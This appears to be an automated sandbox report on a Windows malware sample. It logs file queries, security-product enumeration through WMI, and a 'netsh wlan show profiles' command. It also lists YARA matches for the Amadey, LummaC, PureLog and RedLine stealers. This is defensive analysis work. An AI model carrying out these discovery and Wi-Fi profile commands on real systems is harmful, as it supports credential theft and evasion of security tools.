Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Users\user\AppData\Roaming\configurationValue\propro.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Queries volume information: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001053001\gold.exe VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000187001\4767d2e713f2021e8fe856e3ea638b58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000188001\ISetup8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000191001\FirstZ.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001073001\swiiiii.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001085001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000192001\Uni400uni.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation

Source: C:\Users\user\Desktop\bUWKfj04aU.exe

Code function: 0_2_008DC54A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_008DC54A

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_00195370 RegOpenKeyExA,RegCloseKey,RegOpenKeyExA,RegCloseKey,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,

26_2_00195370

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001D2467 _free,_free,_free,GetTimeZoneInformation,_free,

26_2_001D2467

Source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe

Code function: 26_2_001972F0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

26_2_001972F0

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Source: RegAsm.exe, 00000015.00000002.2567701880.0000000001235000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2648072968.00000000012C8000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001107001\jok.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 26.2.NewB.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.NewB.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.NewB.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.bUWKfj04aU.exe.8c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000000.2303988986.0000000000191000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.2335483499.0000000000191000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2152679736.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2112311636.0000000005090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2150646728.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\NewB[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\clip64[1].dll, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 00000015.00000002.2567701880.00000000012B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 4976, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 10.0.alexxxxxxxx.exe.5f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.2217700639.00000000005F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3c762de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b05570.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.Traffic.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.Traffic.exe.125f1a78.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b07541.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 47.0.jok.exe.680000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3c762de.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.propro.exe.a20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.alexxxxxxxx.exe.3b8e946.0.unpack, type: UNPACKEDPE
